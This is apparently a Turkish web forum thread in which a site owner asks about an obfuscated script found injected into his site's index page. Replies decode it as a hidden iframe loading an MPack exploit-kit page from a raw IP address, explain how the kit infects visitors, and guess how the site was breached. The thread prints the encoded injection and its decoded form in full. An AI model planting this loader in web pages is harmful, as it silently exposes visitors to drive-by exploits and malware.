anlamsız bir script

[msk1977]

Kod:

<script type="text/javascript" language="JavaScript"> eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%5C%22%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%35%30%2E%38%32%2F%6D%70%61%63%6B%2F%69%6E%64%65%78%2E%70%68%70%5C%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%5C%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%5C%22%3E%3C%2F%69%66%72%61%6D%65%3E%22%29%3B%0D%0A%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%22%20%22%3B"));</script>

bu nedir sabah sitemin index sayfasında buldum tabi site açmıyordu

[Virtuozzo]

Şifrelenmiş bir kod.
Muhtemelen ya başka siteye yönlendirmek, program yükletmek ya da popup vs. için kullanılan bir koddur.
Kodları sitenden kaldırman yararına olacaktır.

[ajnglagla]

domainvalet banerlarından kurtulun gibi bir sayfada rastlamıştım bu tür bi koda

[asker]

O kodun sayfanda senden habersiz ne işi var?
Biri index dosyasına ulaşıyor olmasın?

[msk1977]

index atma dedikleri böyle birşeymi acaba hiç haberim yok sabah bir baktım bu kodlar var sayfadaki kodların yarısıda yok

[Virtuozzo]

Index atma dedikleri tam anlamıyla bu değil.
Index atıldığında sizin index yani giriş sayfanız devredışı bırakılır ve saldırganın kendi hazırladığı sayfa giriş sayfası yapılır.
Bu sizin giriş sayfanıza ekstra kod ekleme işlemidir.
Genelde ziyaretçinin bilgisayarına mIRC, trojan vs. yükletmek için kullanılan bir yöntemdir.
Sitenizin ve sunucunuzun güvenliğini gözden geçirmeniz yararınıza olacaktır.

[mTuran]

kodun anlamlı hali şudur:

PHP Kodu:

document.write("<iframe src=\"http://81.95.150.82/mpack/index.php\" width=0  height=0 style=\"display:none\">"); window.status=" "; 


[tankado]

MPack hakkında kısa bir açıklama yapayım.

Aynen yukarıda olduğu gibi iframe ile (sizin durumunuzda muhtemelen sql inkection ile sayfaya dahil edilmiş) sayfaya dahil ediliyor. JS kodu ile tarayıcının tipi ve sürümü belirlendikten sonra, ilgili tarayıcı için geçerli olan exploitleri bir ajanı yüklümek için deniyor ve başarılı olursa bilgisayar zombiye dünüşüyor.

2006 sının sonunda 3 kişilik bir rus ekibin başlattığı bir proje, kodu ve güncellemelerini e-gold üzerinden para karşılığı satıyorlar. Şubat ayında mevcut açıkları kullanarak 100K üzerinde keylogger (tuş kaydedici) yükledikten sonra rapor edilmiş. Web attacker adında bir muadili de var. Aslındada WA daha eski.

[Meteryus]

Alıntı:

sizin durumunuzda muhtemelen sql inkection ile sayfaya dahil edilmiş

kodlar sitenin index dosyasında göründüğüne göre sql injection olma ihtimali pek yok , saldırgan dosyalara erişim için bir yol bulmuş olmalı, doğru ayarlanmamış yazma yetkileri buna sebep olmuş olabilir.

[cemaliozan]

Alıntı:

Meteryus, mesajından alıntı:

kodlar sitenin index dosyasında göründüğüne göre sql injection olma ihtimali pek yok , saldırgan dosyalara erişim için bir yol bulmuş olmalı, doğru ayarlanmamış yazma yetkileri buna sebep olmuş olabilir.

yada lisanssız kullanılan eklentilerde sebep olabilir... Hazır forumlar gibi....Bu tür eklentiler kendi lisans bilgilerini kontrol edip sunucuda belirli dosyalara exploit ekleyebilirler.